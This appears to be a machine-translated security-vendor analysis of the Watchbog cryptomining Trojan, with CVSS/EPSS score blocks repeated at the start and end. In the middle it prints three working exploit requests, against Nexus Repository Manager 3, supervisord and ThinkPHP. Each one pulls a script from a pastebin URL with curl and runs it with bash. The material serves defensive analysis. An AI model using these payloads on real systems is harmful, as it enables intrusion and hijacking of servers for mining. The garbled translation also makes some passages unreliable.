8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
Recently, Ali cloud security monitoring to watchbog mining Trojan use the new exposure of the Nexus Repository Manager 3 remote code execution vulnerability(CVE-2019-7238)for attack and mining the events.
It is worth noting that this attack Start Time 2 on 24th and 2 on 5 May above products, the parent company issued a vulnerability announcement separated by only more than half a month, once again confirms the“vulnerability from exposure to the Black output is used for mining the time is growing short.” In addition, the attacker also utilizes supervisord is restarted, the ThinkPHP products such as vulnerability to attack.
This article analyzed the Trojan’s internal structure and mode of transmission, and on how to clean up, to prevent similar mining Trojan gives security recommendations.
Mining Trojan spread analysis
Attacker major through the direct attack of the host service’s vulnerability to Trojan propagation, which means that it does not currently have the worms contagious, this point is similar to 8220 gang. Even so, attacker still gets a lot of broiler chickens.
In particular, 2 on 24 May, the attack from the original attack only ThinkPHP and supervisord is restarted, to join the Nexus Repository Manager 3 the attack code, you can see the mining pool hash rate on the day that surged about 3-fold, reaching 210KH/s around earnings about $ 25/day, meaning that the highest may have 1 to 2 million hosts controlled mining。
!
The following is Ali Cloud Security to the acquisition of the 3 types of attack payload
(1)for the Nexus Repository Manager 3 remote code execution vulnerability(CVE-2019-7238)the use of
POST /service/extdirect HTTP/1.1 Host: 【victim_ip】:8081X-Requested-With: XMLHttpRequestContent-Type: application/json {“action”: “coreui_Component”, “type”: “rpc”, “tid”: 8, “data”: [{“sort”: [{“direction”: “ASC”, “property”: “name”}], “start”: 0, “filter”: [{“property”: “repositoryName”, “value”: “*”}, {“property”: “expression”, “value”: “233. class. forName(‘java. lang. Runtime’). getRuntime(). exec(‘curl-fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby’)”}, {“property”: “type”, “value”: “jexl”}], “limit”: 50, “page”: 1}], “method”: “previewAssets”}
(2)for supervisord is restarted remote command execution vulnerability(CVE-2017-11610)the use of
POST /RPC2 HTTP/1.1 Host: 【victim_ip】:9001Content-Type: application/x-www-form-urlencoded u0002u0002supervisor. supervisord is restarted. options. warnings. linecache. os. systemu0002
u0002
u0002curl https://pastebin.com/raw/zXcDajSs -o /tmp/babyu0002u0002u0002
(3)for ThinkPHP remote command execution vulnerability exploit
POST /index. php? s=captcha HTTP/1.1
Host: 【victim_host】
Content-Type: application/x-www-form-urlencoded
_method=__construct&filter;[]=system&method;=get&server;[REQUEST_METHOD]=curl-fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
The above three kinds of payload the purpose is the same, that is, the control of the host by executing the following command
curl-fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
Trojan functional structure analysis
!
The attacked host controlled access https://pastebin. com/raw/zXcDajSs, after repeated after the jump, you will get the following figure shows the shell script, which contains cronlow(), cronhigh(), flyaway()and other functions.
!
After analyzing the results, the script mainly contains following several modules:
It will be followed by a request to https://pastebin. com/raw/05p0fTYd such as a plurality of addresses, and executes the received Command. Interestingly, these addresses are currently are stored in some common words, may be the Trojan author reserved for future use.
flyaway()function and the dragon()is slightly different, it will start with the https://pixeldra. in/api/download/8iFEEg download/tmp/elavate it.
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%